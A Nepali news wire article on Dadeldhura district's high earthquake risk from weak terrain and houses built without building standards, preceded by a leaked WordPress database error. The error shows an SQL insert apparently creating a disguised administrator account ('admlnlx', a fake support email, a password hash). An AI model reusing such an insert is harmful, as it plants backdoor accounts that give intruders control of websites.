WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/vxWfNnZVbMhgS5mtMRlr/FZAnyc20', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 06:26:33', '', 'admlnlx', 'admlnlx')
डडेल्धुरा,माघ २ –
समुद्री सतहदेखि करिब दुई हजार ६ सय मिटर उचाइमा रहेको डडेल्धुराको भूबनोट कमजोर भएकाले भूकम्पको उच्च जोखिममा रहेको तथ्याङ्क सार्वजनिक भएको छ ।
पुरानै शैलीमा निर्मित घर भएकाले भूकम्प जाने हो भने ठूलो धनजनको क्षति हुन सक्ने सर्वसाधारणको समेत बुझाइ छ ।
जिल्ला दैवीप्रकोप उद्धार समितिका संयोजक प्रजिअ उदयबहादुर सिँंले घरहरु बिनामापदण्ड मनपरी किसिमले बनाइएकाले भूकम्प गयो भने क्षति पुग्न सक्ने जनाउँदै सतर्कता अपनाउन सुझाव दिनुभयो ।
सदरमुकाम डडेल्धुरा उच्च जोखिममा रहेको उहाँको भनाइ छ । जिल्लामा भवन तथा भौतिक कुरा निर्माण गर्दा राष्ट्रिय भवन निर्माण आचारसंहिता पूर्ण रुपमा पालना गर्नुपर्ने र भूकम्परहित घरको निर्माण हुनुपर्नेमा सरोकार भएकाहरुको भनाइ छ । भिरालो जमिनमा घर बनाइएकाले डडेल्धुरा उच्च जोखिममा रहेको जिल्ला प्राविधिक कार्यालयका इन्जिनियर रामकुमार श्रेष्ठ बताउनुहुन्छ । यहाँ नयाँ बनेका घर पनि भूकम्प प्रतिरोधात्मक नभएर मनोमानी रुपमा निर्माण भइरहेको इञ्जिनियर श्रेष्ठको जिकिर छ । – रासस